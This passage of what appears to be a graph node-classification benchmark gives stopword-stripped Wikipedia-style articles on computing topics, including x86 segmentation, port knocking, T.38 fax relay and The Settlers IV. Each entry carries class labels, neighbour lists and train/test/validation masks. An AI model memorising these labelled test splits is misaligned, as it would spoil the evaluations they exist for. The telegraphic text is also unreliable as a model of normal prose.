appropriate address-arithmetic instructions suitable flat addressing entire memory range available flat addressing possible applying multiple instructions however leads slower programs memory model concept derives setup segment registers example tiny model cs=ds=ss program code data stack contained within single 64 kb segment small memory model ds=ss data stack reside segment cs points different code segment 64 kb 80286 protected mode extends processor address space 2 bytes 16 megabytes adjusting shift value instead 16-bit segment registers contain index table segment descriptors containing 24-bit base addresses offset added support old software processor starts real mode mode uses segmented addressing model 8086 small difference though resulting physical address longer truncated 20 bits real mode pointers 8086 pointers refer addresses 100000 10ffef roughly 64-kilobyte region memory known high memory area hma later versions ms-dos could use increase available conventional memory i.e within first mb addition hma total address space approximately 1.06 mb though 80286 truncate real-mode addresses 20 bits system containing 80286 hardware external processor gating 21st address line a20 line ibm pc provided hardware full backward compatibility software original ibm pc pc/xt models subsequent at-class pc clones well 286 protected mode seldom used would excluded large body users 8086/88 machines moreover still necessitated dividing memory 64k segments like done real mode limitation worked around 32-bit cpus permit use memory pointers greater 64k size however segment limit field 24-bit long maximum segment size created 16mb although paging used allocate memory individual segment may exceed 16mb method commonly used windows 3.x applications produce flat memory space although os still 16-bit api calls could made 32-bit instructions thus still necessary place code performs api calls 64k segments 286 protected mode invoked could exited except performing hardware reset machines following rising ibm pc/at standard could feign reset cpu via standardised keyboard controller significantly sluggish windows 3.x worked around problems intentionally triggering triple fault interrupt-handling mechanisms cpu would cause cpu drop back real mode nearly instantly logical address consists 16-bit segment selector supplying 13+1 address bits 16-bit offset segment selector must located one segment registers selector consists 2-bit requested privilege level rpl 1-bit table indicator ti 13-bit index attempting address translation given logical address processor reads 64-bit segment descriptor structure either global descriptor table ti=0 local descriptor table ti=1 performs privilege check cpl current privilege level found lower 2 bits cs register rpl requested privilege level segment selector dpl descriptor privilege level segment found descriptor privilege levels integers range 0–3 lowest number corresponds highest privilege inequality false processor generates general protection gp fault otherwise address translation continues processor takes 32-bit 16-bit offset compares segment limit specified segment descriptor larger gp fault generated otherwise processor adds 24-bit segment base specified descriptor offset creating linear physical address privilege check done segment register loaded segment descriptors cached hidden parts segment registers intel 80386 later protected mode retains segmentation mechanism 80286 protected mode paging unit added second layer address translation segmentation unit physical bus also importantly address offsets 32-bit instead 16-bit segment base segment descriptor also 32-bit instead 24-bit general operation segmentation unit otherwise unchanged paging unit may enabled disabled disabled operation 80286 paging unit enabled addresses segment virtual addresses rather physical addresses 80286 segment starting address offset final 32-bit address segmentation unit derived adding two virtual logical addresses paging unit enabled segmentation unit generates validates 32-bit virtual addresses enabled paging unit finally translates virtual addresses physical addresses physical addresses 32-bit 386 larger newer processors support physical address extension 80386 also introduced two new general-purpose data segment registers fs gs original set four segment registers cs ds es ss 386 cpu put back real mode clearing bit cr0 control register however privileged operation order enforce security robustness way comparison 286 could returned real mode forcing processor reset e.g triple fault using external hardware x86-64 architecture use segmentation long mode 64-bit mode four segment registers cs ss ds es forced 0 limit 2 segment registers fs gs still nonzero base address allows operating systems use segments special purposes unlike global descriptor table mechanism used legacy modes base address segments stored model-specific register x86-64 architecture provides special swapgs instruction allows swapping kernel mode user mode base addresses instance microsoft windows x86-64 uses gs segment point thread environment block small data structure thread contains information exception handling thread-local variables per-thread state similarly linux kernel uses gs segment store per-cpu data x64 cpu powers real mode indistinguishable 32-bit pentium 4 64-bit instructions used unless long mode set long mode operating 16-bit instructions virtual x86 mode disabled protected mode disappears gs/fs also used gcc thread-local storage canary-based stack protector logical addresses explicitly specified x86 assembly language e.g syntax intel syntax mov dword fs eax 42 however segment registers usually used implicitly segmentation turned x86-32 processors true 64-bit mode well beyond scope discussion many 32-bit operating systems simulate flat memory model setting segments bases 0 order make segmentation neutral programs instance linux kernel sets 4 general purpose segments since base set 0 cases limit 4 gib segmentation unit affect addresses program issues arrive paging unit course refers 80386 later processors earlier x86 processors paging unit current linux also uses gs point thread-local storage segments defined either code data system segments additional permission bits present make segments read read/write execute etc protected mode code may always modify segment registers except cs code segment selector current privilege level cpl processor stored lower 2 bits cs register ways raise processor privilege level reload cs lcall far call int interrupt instructions similarly ways lower privilege level reload cs lret far return iret interrupt return instructions real mode code may also modify cs register making far jump using undocumented codice_1 instruction 8086 8088 course real mode privilege levels programs absolute unchecked access memory cpu instructions information segmentation see ia-32 manuals freely available amd intel websites",
    "neighbors": [
      2304,
      1922,
      5380,
      6921,
      9996,
      6797,
      5008,
      9490,
      11539,
      4884,
      3990,
      6296,
      541,
      3871,
      1954,
      6570,
      2987,
      10284,
      6829,
      814,
      5040,
      435,
      3512,
      6078,
      2625,
      1474,
      2627,
      6596,
      10561,
      1736,
      4424,
      6730,
      6221,
      7501,
      9166,
      5840,
      5073,
      5074,
      7760,
      7508,
      86,
      5080,
      5598,
      1247,
      8545,
      6754,
      8551,
      2152,
      7403,
      5356,
      8301,
      5358,
      1903,
      499,
      3702,
      634,
      2811,
      6652,
      8573,
      7039
    ],
    "mask": "Test"
  },
  {
    "node_id": 6869,
    "label": 2,
    "text": "Windows_Activation_Services:windows activation services windows process activation service also known process activation mechanism introduced within internet information services v7.0 windows activation service builds existing internet information services v6.0 powerful provides support protocols besides http tcp named pipes windows activation service extends asp.net http hosting concept asmx web services standalone windows component windows activation service completely separated iis hosting environment provides protocol-agnostic activation mechanism limited http windows activation service allows developers choose appropriate protocol needs http data transfer relies asp.net http protocols tcp named pipes windows activation service leverages extensibility points asp.net transferring data capabilities implemented form protocol handlers manage communication worker process windows service two types protocol handlers loaded activates worker process instance process protocol handler pph app domain protocol handler adph",
    "neighbors": [
      2244,
      1098,
      10924,
      6797,
      7983,
      4439,
      4797,
      7838
    ],
    "mask": "Test"
  },
  {
    "node_id": 6870,
    "label": 2,
    "text": "Nokia_X5:nokia x5 nokia x5-00/01 pair smartphones x-series nokia mobile phones original china model comes symbian os 9.3 worldwide model uses s60 3rd edition fp2 x5-00 released china second quarter 2010 x6 could released region due china still using partial-3g td-scdma mobile network mobile phones unlike selected countries started use 3.5g hsdpa mobile network although original version x5 china alternative version original x6 large on-board memory comes music service later june 2010 nokia announced x5 gain release countries china named x5-01 features wider smaller 2.36-inch screen better microsdhc support 32 gb sdhc use hsdpa network mode released september 2010 july 2018 hmd global released new android phone name nokia x5 2018 original x5 candybar mobile phone alpha-numeric keypad features carl zeiss 5-megapixel camera equipped dual led flash 256 mb internal memory use 8 gb microsd card nokia x5-01 slider mobile phone qwerty/qwertz keypad depending country sale features five megapixels camera led flash arm 11 600 mhz processor 200 mb internal memory 32 gb microsd 2 gb card included sales package x5-01 wi-fi phone models bluetooth connectivity running symbian os 9.3 series 60 v3.2 ui design original x5 mixed reviews despite china-only release design x5-01 come great criticism vastly deficient dimensions phone 74.3 × 66.4 × 16.8 mm weight 129 grams display 2.36 phone comes full qwerty keypad available six colors yellow green purple pink azure graphite black phone comes additional 3 labeled soft keys media keys volume keys navi keys",
    "neighbors": [
      1537,
      4609,
      8577,
      3205,
      11655,
      9359,
      1424,
      529,
      2449,
      8083,
      10770,
      5143,
      2072,
      7063,
      5274,
      5019,
      5659,
      669,
      8472,
      11545,
      4003,
      4132,
      6310,
      167,
      40,
      3626,
      5290,
      10410,
      10802,
      7220,
      821,
      5175,
      7866,
      1083,
      1728,
      7617,
      4291,
      7877,
      10053,
      199,
      967,
      9292,
      7246,
      1615,
      4305,
      5201,
      2259,
      6996,
      7253,
      854,
      10583,
      5211,
      6748,
      1633,
      9443,
      3300,
      4324,
      7399,
      8423,
      6505,
      10599,
      109,
      5998,
      1776,
      8433,
      1533
    ],
    "mask": "None"
  },
  {
    "node_id": 6871,
    "label": 9,
    "text": "Circular_dependency:circular dependency software engineering circular dependency relation two modules either directly indirectly depend function properly modules also known mutually recursive circular dependencies natural many domain models certain objects domain depend however software design circular dependencies larger software modules considered anti-pattern negative effects however circular cyclic dependencies found widespread among source files real-world software mutually recursive modules however somewhat common functional programming inductive recursive definitions often encouraged circular dependencies cause many unwanted effects software programs problematic software design point view tight coupling mutually dependent modules reduces makes impossible separate re-use single module circular dependencies cause domino effect small local change one module spreads modules unwanted global effects program errors compile errors circular dependencies also result infinite recursions unexpected failures circular dependencies may also cause memory leaks preventing certain primitive automatic garbage collectors use reference counting deallocating unused objects large software designs software engineers may lose context inadvertently introduce circular dependencies tools analyze software find unwanted circular dependencies circular dependencies often introduced inexperienced programmers need implement kind callback functionality experienced programmers avoid unnecessary circular dependencies applying design patterns like observer pattern implementation circular dependencies c/c++ bit tricky structure class definition must placed usage file circular dependency classes b thus require definition placed b definition b placed course impossible forward declaration therefore needed accomplish following example illustrates done note although name e.g codice_1 declared multiple times forward declarations defined one definition rule following another example forward declaration might useful application needs self-sustaining array objects able add remove objects run-time static variables first last defined declaration reserve memory space note static variables change object object stay given class also initialized 0 null know start",
    "neighbors": [
      2304,
      8582,
      2887,
      2417,
      9490,
      2012
    ],
    "mask": "Test"
  },
  {
    "node_id": 6872,
    "label": 3,
    "text": "Alcazar:_The_Forgotten_Fortress:alcazar forgotten fortress alcazar forgotten fortress dungeon action-adventure game similar dungeon master legend zelda released 1985 coleco adam computer accessory also port colecovision created tom loughry activision graphics keri janssen longaway game also ported commodore 64 later plot alcazar get main castle alcazar going multiple enemy castles retrieve stolen crown game starts world map contains 22 castles player main goal move character various castles ultimately arrive main castle fortress right side map castle multiple rooms traps floors map routes change every time new game started game four difficulty levels beginner intermediate advanced expert various items may also obtained game pistol used attacking hook used cross gaps also map bottom left corner help prevent lost castle dungeons also many traps enemies present player either fight evade player incurs much damage lose life losing lives ends game though extra lives may also obtained well game continues adam version game supports saving game one earliest adventure games demo mode shows demonstration game play wait title screen 30 seconds game go mode ahoy praised alcazar beautifully written theme song stated graphics insufficiently detailed magazine concluded game enticing blend mental physical stimulation ... electronic passport hours entertainment",
    "neighbors": [
      10931,
      9006
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6873,
    "label": 3,
    "text": "PlayStation_2_online_functionality:playstation 2 online functionality selected games sony playstation 2 video game console offer online gaming online capabilities games enable feature provide free online play use broadband internet connection playstation 2 network adaptor since service official name sometimes referred either ps2 network play ps2 network gaming ps2 online service launched july 2001 japan august 2002 north america june 2003 europe slimline models network adapter integrated hardware games also allowed online gameplay using dial-up connection available models lan play connecting two network adapters/slimline consoles together directly ethernet cable router network instead unified online service like seganet xbox live online multiplayer ps2 responsibility game publisher run third-party servers however later ps2 online games required console authorized sony dynamic network authentication system dnas connecting server unofficial servers also exist could connected setting dns settings connect unofficial dns server recent ps2 online games developed exclusively support broadband internet access last official online server final fantasy xi ultimately shut march 31 2016 dnas following couple days later april 4 indirectly shutting several remaining unofficial servers exception ones support non-dnas ps2 titles tony hawk pro skater 3 despite dnas shutdown several fan created servers still exist require dnas workaround connect exceptions call duty 3 older models non-slim playstation 2 console network adapter needed play online use hard drive versions network adapter provide ethernet port north american versions also featured phone-line port dial-up connection newer slimline versions however ethernet port built making network adapter unnecessary hard drive use nearly impossible well ruling need keep network adapter production playing online games requires users set system network connection configuration saved memory card done network startup disk came network adapter using one many games utility built resident evil outbreak set network settings new slimline playstation 2 came disk box default last version disk network startup disk 5.0 included newer scph 90004 model released 2009 however december 31 2012 playstation 2 discontinued servers games since shut released 2002 final fantasy xi first ever console game offer cross-platform play connecting playstation 2 personal computer released august year one first video games allowed voice chat console pal games supported online gaming display net play logo cover north american games feature online icon lower right corner cover games support dial-up connectivity broadband also found logo time game servers shut however computer programs xbslink svdl xlink kai allow users achieve online play ps2 games using network configuration simulates worldwide lan",
    "neighbors": [
      643,
      9091,
      3077,
      11398,
      10761,
      6799,
      9508,
      6311,
      9512,
      684,
      306,
      1587,
      1091,
      9543,
      10056,
      6732,
      10316,
      7502,
      6738,
      859,
      4060,
      5215,
      607,
      359,
      8937,
      3824,
      5746,
      7028,
      7801,
      8316,
      6781
    ],
    "mask": "None"
  },
  {
    "node_id": 6874,
    "label": 4,
    "text": "Trishneet_Arora:trishneet arora trishneet arora born 2 november 1993 founder ceo tac security security company arora written books cyber security ethical hacking web defence named forbes 30 30 2018 asia list fortune magazine 40 40 2019 list india brightest business minds arora founded tac security cyber security company provides protection corporations network vulnerabilities data theft clients reliance industries central bureau investigation punjab police india gujarat police helps punjab gujarat police investigating cyber crimes conducted training sessions officials arora company mainly provides vulnerability assessment penetration testing services according arora increase number attacks portals companies 2016 tac security raised pre-series funding indian investor vijay kedia prior tac security inducted subinder khurana former vice president cognizant board film-maker sunil bohra working biographical film arora expected released 2019",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 6875,
    "label": 8,
    "text": "Hessian_(Web_service_protocol):hessian web service protocol hessian binary web service protocol makes web services usable without requiring large framework without learning new set protocols binary protocol well-suited sending binary data without need extend protocol attachments hessian developed caucho technology inc company released java python actionscript adobe flash implementations hessian open source license apache license third-party implementations several languages c++ c javascript perl php ruby objective-c erlang also available open-source although hessian primarily intended web services adapted tcp traffic using hessianinput hessianoutput classes caucho java implementation",
    "neighbors": [
      8644,
      10020,
      3462,
      8582,
      10470,
      11303,
      8554,
      11355,
      5612,
      5677,
      5165,
      7983,
      10924,
      10097,
      6555,
      9245
    ],
    "mask": "None"
  },
  {
    "node_id": 6876,
    "label": 4,
    "text": "Tagged_Message_Delivery_Agent:tagged message delivery agent tmda open-source software application designed reduce amount junk email user receives tmda main difference anti-spam systems use controversial challenge/response system bulk mailing machines programs either unwilling save bandwidth unable due lack programming answer technical countermeasures used tmda thwart spam include",
    "neighbors": [
      2527
    ],
    "mask": "None"
  },
  {
    "node_id": 6877,
    "label": 4,
    "text": "Port_knocking:port knocking computer networking port knocking method externally opening ports firewall generating connection attempt set prespecified closed ports correct sequence connection attempts received firewall rules dynamically modified allow host sent connection attempts connect specific port variant called single packet authorization exists single knock needed consisting encrypted packet primary purpose port knocking prevent attacker scanning system potentially exploitable services port scan unless attacker sends correct knock sequence protected ports appear closed port knocking usually implemented configuring daemon watch firewall log file connection attempts certain points modify firewall configuration accordingly also performed kernel level using kernel-level packet filter iptables userspace process examining packets higher level using packet capture interfaces pcap allowing use already open tcp ports used within knock sequence port knock similar secret handshake consist number tcp udp even sometimes icmp protocol packets numbered ports destination machine complexity knock anything simple ordered list e.g tcp port 1000 tcp port 2000 udp port 3000 complex time-dependent source-ip-based other-factor-based encrypted hash portknock daemon firewall machine listens packets certain ports either via firewall log packet capture client user would carry extra utility could simple netcat modified ping program complicated full hash-generator use attempted connect machine usual way portknocks stateful systems first part knock received successfully incorrect second part would allow remote user continue indeed would give remote user clue far sequence failed usually indication failure end knock sequence port expected open opened packets sent remote user time technique securing access remote network daemons widely adopted security community actively used many rootkits even year 2000 defeating port knocking protection requires large-scale brute force attacks order discover even simple sequences anonymous brute force attack three-knock tcp sequence e.g port 1000 2000 3000 would require attacker test every three port combination 1–65535 range scan port attacks uncover changes port access target system since port knocking definition stateful requested port would open correct three-port number sequence received correct order without receiving intervening packets source average case scenario requires approximately 141 trillion 65535 2 packets determine correct three-port number technique combination knock attempt-limiting longer complex sequences cryptographic hashes makes successful port access attempts extremely difficult successful port knock sequence supplied open port firewall rules generally open port ip address supplied correct knock adding dynamic functionality firewall behaviour instead using preconfigured static ip whitelist firewall authorised user situated anywhere world would able open necessary port without assistance server administrator system could also configured allow authenticated user manually close port session close automatically using timeout mechanism establish new session remote user would required reauthenticate using correct sequence stateful behaviour port knocking allows several users different source ip addresses varying levels port knock authentication simultaneously allowing legitimate user correct knock sequence firewall firewall middle port attack multiple ip addresses assuming bandwidth firewall completely consumed attacking ip address ports firewall still appear closed using cryptographic hashes inside port knock sequence defends packet sniffing source target machines preventing discovery port knock sequence using information create traffic replay attacks repeat prior port knock sequences port knocking used part defense depth strategy even attacker successfully gain port access port security mechanisms still place along assigned service authentication mechanisms opened ports implementation technique straightforward using bare minimum shell script server windows batch file command line utility client overhead server client terms traffic cpu memory consumption minimal port knock daemons complex code type vulnerability within code obvious auditable port knock system implemented ports ssh sidesteps issue brute force password attacks logins case ssh ssh daemon activated without correct port knock attack filtered tcp/ip stack rather using ssh authentication resources attacker daemon inaccessible correct port knock supplied port knocking flexible customisable system add-in administrator chooses link knock sequence activity running shell script changes implementing additional firewall rules open ports specific ip addresses easily incorporated script simultaneous sessions easily accommodated addition mitigating brute force password attacks inevitable growth logs associated process daemon port knocking also protects protocol vulnerability exploits exploit discovered could compromise daemon default configuration using port knocking listening port reduces possibility compromise software process updated authorized users would continue served provide correct knock sequence random access attempts would ignored port knocking viewed part overall network defense strategy providing protection random targeted attacks complete standalone solution network security professionals largely ignored port knocking solution past since early implementations relied solely providing correct port combinations achieve access modern port knock systems incorporate features secure cryptographic hashes blacklists whitelists dynamic attack responses increase system capability port knocking effective means maximizing server resources internet facing networks properly implemented port knocking lower overall security system effective measure provides additional layer security minimal server resource overhead worst systems port knocking introduce new security issues poor implementation expose ambivalent administration attitudes situations risk compensation port knocking totally dependent robustness port knocking daemon failure daemon deny port access users usability security perspective undesirable single point failure modern port knocking implementations mitigate issue providing process-monitoring daemon restart failed stalled port knocking daemon process systems use cryptographic hashes vulnerable ip address spoofing attacks attacks form denial service use port knocking functionality lock known ip addresses e.g administrator management stations sending packets spoofed ip address random ports servers using static addressing especially vulnerable types denials service addresses well known port knocking problematic networks exhibiting high latency port knocking depends packets arriving correct sequence access designed functionality tcp/ip hand designed function assembling order packets coherent message situations solution client continue resending correct sequence packets periodic basis sequence acknowledged server port knocking used sole authentication mechanism server security perspective simple port knocking relies security obscurity unintended publication knock sequence infers compromise devices supporting sequence furthermore unencrypted port knocking vulnerable packet sniffing network trace suitable length detect correct knock sequence single ip address thus provide mechanism unauthorised access server extension attached network compromised log files device source valid knock sequences revealing another point failure solutions treating knock sequence one-time password defeat aim simplified administration practice port knocking must combined forms authentication vulnerable replay man-in-the-middle attacks whole system effective",
    "neighbors": [
      2947,
      7556,
      14,
      4369,
      10387,
      11413,
      5402,
      939,
      10924,
      3629,
      9791,
      8386,
      9285,
      6345,
      10442,
      3924,
      10341,
      2409,
      1776,
      8694,
      4863
    ],
    "mask": "Test"
  },
  {
    "node_id": 6878,
    "label": 3,
    "text": "Broadway_(microprocessor):broadway microprocessor broadway codename 32-bit central processing unit cpu used nintendo wii video game console designed ibm initially produced using 90nm soi process later produced 65nm soi process according ibm processor consumes 20 less power predecessor 180 nm gekko used nintendo gamecube video game console broadway produced ibm 300 mm semiconductor development manufacturing facility east fishkill new york bond assembly test operation broadway module performed ibm facility bromont quebec official details released public nintendo ibm unofficial reports claim derived 486 mhz gekko architecture used gamecube runs 50 faster 729 mhz powerpc 750cl released 2006 stock cpu offered ibm virtually identical broadway difference 750cl came variants ranging 400 mhz 1000 mhz",
    "neighbors": [
      6914,
      7170,
      4868,
      10501,
      3846,
      4743,
      6663,
      5642,
      1548,
      1933,
      398,
      6926,
      3472,
      4881,
      659,
      7065,
      1563,
      1309,
      6815,
      10784,
      3493,
      6949,
      6311,
      4136,
      1321,
      8102,
      1067,
      4653,
      9391,
      10543,
      4017,
      5297,
      8120,
      6715,
      9020,
      1725,
      1983,
      1985,
      10180,
      6981,
      2635,
      336,
      8530,
      3540,
      342,
      9302,
      4569,
      11613,
      1635,
      8931,
      869,
      10214,
      10985,
      10734,
      1776,
      3185,
      4465,
      4211,
      5235,
      5237,
      5617,
      8058,
      3323,
      8700
    ],
    "mask": "Train"
  },
  {
    "node_id": 6879,
    "label": 3,
    "text": "NEC_RISCstation:nec riscstation nec riscstation line computer workstations made nec mid-1990s based mips risc microprocessors designed run microsoft windows nt series nearly identical machines also sold nec headless i.e. video card framebuffer configuration riscserver series intended use windows nt workgroup servers riscstations based modified jazz architecture licensed mips computer systems inc. originally designed microsoft although architecturally similar contemporaneous intel 80386-based personal computers including example pci bus riscstations faster pentium-based workstations time although based jazz design riscstations use g364 framebuffer instead using s3 968-based video card 3dlabs glint-based adapter pci slot riscstations used standard ibm at-style tower minitower case motherboard also met form factor standard pci peripherals video card peripheral expansion several operating systems supported riscstations like jazz-based mips computers mips magnum riscstations ran arc console firmware boot windows nt little-endian mode mips iii architecture capable either little-endian big-endian operation however microsoft stopped supporting mips architecture windows nt version 4.0 riscstations ceased production 1996 addition windows nt nec ported version unix system v riscstation although support lacking linux/mips riscstation series supported netbsd netbsd/arc supported openbsd prior termination port 1998 riscstation line included march 1995 dual-cpu configuration riscstation 2000 priced 14,000 came equipped two 150 mhz mips r4400 cpus 64 mb ram 1 gb scsi hard drive 3x cd-rom drive 17-inch nec-brand crt monitor",
    "neighbors": [
      7234,
      6854,
      3818,
      6252,
      7215,
      8976,
      7442,
      2995,
      5492,
      2452,
      5686,
      823,
      8851,
      6942
    ],
    "mask": "Test"
  },
  {
    "node_id": 6880,
    "label": 5,
    "text": "T.38:t.38 t.38 itu recommendation allowing transmission fax ip networks foip real time t.38 fax relay standard devised 1998 way permit faxes transported across ip networks existing group 3 g3 fax terminals t.4 related fax standards published itu 1980 rise internet late 1990s voip voice ip began gain ground alternative conventional public switched telephone network pstn however voip systems optimized use aggressive lossy bandwidth-saving compression voice rather data calls conventional fax machines worked poorly due network impairments delay jitter packet loss thus way transmitting fax ip needed practical scenarios t.38 fax call least part call carried pstn although required t.38 definition two t.38 devices send faxes particular type device called internet-aware fax device iaf capable initiating completing fax call towards ip network typical scenario t.38 used t.38 fax relay t.30 fax device sends fax pstn t.38 fax gateway converts encapsulates t.30 protocol t.38 data stream sent either t.38 enabled end point fax machine fax server another t.38 gateway converts back pstn pcm analog signal terminates fax t.30 device t.38 recommendation defines use tcp udp transport t.38 packets implementations tend use udp due tcp requirement acknowledgement packets resulting retransmission packet loss introduces delays using udp t.38 copes packet loss using redundant data packets t.38 call setup protocol thus t.38 devices need use standard call setup protocols negotiate t.38 call e.g h.323 sip mgcp two primary ways fax transactions conveyed across packet networks t.37 standard specifies fax image encapsulated e-mail transported ultimately recipient using store-and-forward process intermediary entities t.38 however defines protocol supports use t.30 protocol sender recipient terminals see diagram t.38 lets one transmit fax across ip network real time original g3 fax standards traditional time-division multiplexed tdm network also called public switched telephone network pstn special protocol needed real-time fax ip internet protocol since existing fax terminals supported pstn connections information flow generally smooth uninterrupted opposed jittery arrival ip packets trick come protocol makes ip network “ invisible ” endpoint fax terminals would mean user legacy fax terminal need know fax call traversing ip network network interconnections supported t.38 shown two fax terminals either side figure communicate using t.30 fax protocol published itu 1980 interconnection pstn ip packet network requires “ gateway ” pstn ip networks pstn-ip gateways support tdm voice pstn side voip foip packet side voice sessions gateway take voice packets ip side accumulate packets ensure smooth flow tdm data upon release meter tdm eventually heard human stored computer later playback gateway employs packet-management techniques enhance quality speech presence network errors taking advantage natural ability listener really hear occasional missing repeated packet facsimile data transmitted modems ’ forgiving human ear speech missing packets often cause fax session fail worst create one image lines error best job t.38 “ fool ” terminal “ thinking ” ’ communicating directly another t.30 terminal also correct network delays so-called spoofing techniques missing delayed packets fax-aware buffer-management techniques spoofing refers logic implemented protocol engine t.38 relay modifies protocol commands responses tdm side keep network delays ip side causing transaction fail done example padding image lines deliberately causing message re-transmitted render network delays transparent sending/receiving fax terminals networks packet loss excessive delay exhibit acceptable fax performance without t.38 provided pcm clocks gateways high accuracy explained t.38 removes effect pcm clocks synchronized also reduces required network bandwidth factor 10 corrects packet loss delay shown diagram t.38 gateway composed two primary elements fax modems t.38 subsystem fax modems modulate demodulate pcm samples analog data turning sampled-data representation fax terminal ’ analog signal binary translation vice versa pstn network samples analog signal voice modem signal ’ know difference 8,000 times per second sps encodes 8-bit data bytes means 8000 samples-per-second times 8-bits per sample 64,000 bits per second bit/s represent modem voice data one direction directions modem transaction consumes 128,000 bits network bandwidth however typical modem fax terminal transmits image data 33,600 bit/s analog data first converted digital content represent 33,600 bits plus network overhead bytes needed since t.30 fax half-duplex protocol network needed one direction time refer rfc 3261 diagram sample-rate clock fax terminal one gateway ’ modems used trigger sampling analog line 8,000 times per second clocks usually quite accurate low-cost terminal adapters one two-line gateway pcm clock surprisingly inaccurate terminal sending data gateway gateway ’ clock slow buffers jitter buffers gateway eventually overflow causing transaction fail since difference often quite small problem occurs long detailed fax images giving clocks time cause jitter buffer gateway either underflow overflow missing duplicated packets t.38 provides facilities eliminate effects packet loss data redundancy packet sent either zero one two three even previously sent packets repeated specification impose limit increases network bandwidth required ’ still much less using t.38 allows receiving gateway reconstruct complete packet sequence even fairly high level packet loss",
    "neighbors": [
      6880,
      1121,
      10924,
      7407,
      3921,
      5843,
      11413,
      8541,
      10271
    ],
    "mask": "None"
  },
  {
    "node_id": 6881,
    "label": 5,
    "text": "Diameter_Credit-Control_Application:diameter credit-control application diameter credit-control application networking protocol diameter application used implement real-time credit-control variety end user services ietf standard first defined rfc 4006 updated rfc 8506 purpose diameter credit control application provide framework real-time charging primarily meant communication gateways/control-points back-end account/balance systems typically online charging system application specifies methods diameter credit control application specify type units bought/used items charged left service context specified separately semantics examples units used/bought examples items charged diameter credit control also specifies handle fairly complex issue multiple unit types used/charged single user balance instance user may pay online time download bytes single account balance session-based credit control process uses several interrogations may include first intermediate last interrogation interrogation money reserved user account session-based charging typically used scenarios charged units continuously consumed e.g charging bytes upload/download event-based credit control process uses events charging mechanism event-based charging typically used units continuously consumed e.g user sending mms order support credit control via diameter two diameter messages ccr credit control request cca credit control answer command code ccr/cca 272 defined rfc 4006 quota management client sends ccr server requesting units reporting consumption server grants units charges user simple debit/credit client sends ccr asking server credit/debit user account price inquiries client ask server price unit server responds price message flows general driven control-point asking units server granting message may also generated diameter applications nasreq rfc4005 sessions time/usage-limited following diagram shows simplified message flow session using quota grants client starts requesting 10 units server server verifies user/subscriber enough balance example server grants client units requested subscriber insufficient balance could granted less units rejected completely subscriber session used granted units client sends update server telling many units used many would like granted time client allowed request units previous grant completely used order avoid suspending subscriber session talking server example client sends request 7 units 10 previously granted units used ask 10 units server grants server use used-units count debiting subscriber balance granting units indicate used used-units avp contains actual usage also possible server tell client long grant valid case client expected send update grant timer expires many update messages session finally subscriber ended session client sends termination message server containing last used-units server use termination message clear related reservations made back-end balance management system subscriber terminate session instead depleted balance server would responded earlier reject update message possibly telling client/control-point redirect traffic normally makes sense http/wap traffic new command codes cca ccr may require avps indicated bold avps new dcca table uses following symbols",
    "neighbors": [
      5875,
      8670
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6882,
    "label": 4,
    "text": "FADO:fado fado stands false authentic documents online european image-archiving system set help combat illegal immigration organised crime established joint action council european union enacted 1998 proliferation genuine false documents means frequent updating essential ever sophisticated techniques used produce genuine documents forgeries computerised system restricted access therefore built enables fast secure information exchange general secretariat council european union document experts european union member states iceland norway switzerland database established fado joint acts includes following data fado currently available document experts 31 fado partner states member states european union eu iceland norway switzerland part information shared document experts classified restricted system fado made publicly available via public register authentic documents online prado website managed council european union document descriptions fado available 24 official languages european union documents introduced document experts languages standardised descriptions translated automatically thus documents immediately available supported languages additional free text information contained translated later specialised linguists general secretariat council",
    "neighbors": [
      6298
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6883,
    "label": 2,
    "text": "The_Settlers_IV:settlers iv settlers iv released settlers fourth edition north america real-time strategy video game city-building elements developed blue byte published ubi soft released germany microsoft windows february 2001 united kingdom march north america august fourth game settlers series following settlers 1993 settlers ii 1996 settlers iii 1998 august blue byte released expansion settlers iv mission cd featuring new single-player campaign missions new maps single-player multiplayer modes random map generator map editor gameplay improvements bug fixes december released second expansion settlers iv trojans elixir power containing new single-player campaigns additional single multiplayer maps improved graphics additional gameplay tweaks march 2002 settlers iv gold edition released containing original game expansions plus fan-made maps multiplayer mode two minigames november 2009 gameloft ported original game ios title settlers although featuring updated graphics utilising touch controls gameplay game mechanics storyline identical original april 2010 settlers released webos specifically optimised palm pre gameloft later released hd versions ipad bada symbian android 2013 gold edition released gog.com 2018 game re-released settlers iv history edition game single-player campaign player controls three races romans vikings mayans initially fight one another joining forces combat much greater threat posed exiled god morbus banished earth instigating failed rebellion great god unable bear touching foliage morbus leads mysterious dark tribe sets attempting erase natural greenery planet surface trojans elixir power takes place many centuries later war dark tribe faded memory three victorious civilisations returned fighting one another however morbus proves threat attempting permanently cure allergy greenery creating powerful elixir falls trojans unite others stand dark tribe acting feedback fans felt settlers iii focused combat designers aimed return core supply demand-based gameplay first two titles series result game designed strike balance economic planning military conquest although basic gameplay remains relatively unchanged settlers iii game mechanics altered example first time series offensive strength player military tied economic value settlement player access rank soldier beginning mission ability select rank every soldier prior recruitment game single-player campaign focuses race defeated solely military means specialty units squad leaders added enhance tactical aspects combat warships also made available allowing combat sea settlers iv received mixed reviews critics feeling similar settlers iii many opining blue byte failed steer gameplay away over-reliance combat although graphics animations generally praised ai mission variety limited combat strategy criticised reviews comparing game unfavourably titles age empires ii handheld version received positive reviews lauded replicating original game portable device successfully adapting controls touchscreen common criticism concerned lack free play multiplayer modes settlers iv real-time strategy game city-building elements controlled via point click interface general gameplay game mechanics similar settlers iii primary goal maps build settlement functioning economy producing sufficient military and/or specialist units conquer rival territories achieve end player must engage economic micromanagement construct buildings generate resources game played one two modes single-player multiplayer single-player mode player play either campaign missions individual non-campaign games free maps campaign mode player must complete series missions goal defeat computer controlled opponent opponents gaining possession territory case dark tribe destroying temple using gardeners original release game three separate campaigns three missions one campaign romans vikings mayans fourth campaign twelve missions player controls three races fight dark tribe mission cd expansion added three additional campaigns five missions race plus three settlement missions three conflict missions trojans elixir power expansion added three campaigns four missions original three races four settlement missions new campaign twelve missions player controls trojans dark tribe free maps multiplayer mode played via lan online player chooses map play refines game various ways adjusting number computer controlled opponents amount raw materials available start game and/or victory conditions player also select type game played choosing conflict mode player/race competes one another ranking list players receive points end game ranking blue byte online league table cooperation mode players combine forces achieve predetermined objective computer controlled races economic mode winner player produce goods least four seven categories within time limit settlefest players compete separate identical single-player maps first reach given objective free settle mode one player/race whether playing single-player multiplayer mode game begins way player small settlement set amount raw materials tools predetermined number settlers basic gameplay revolves around 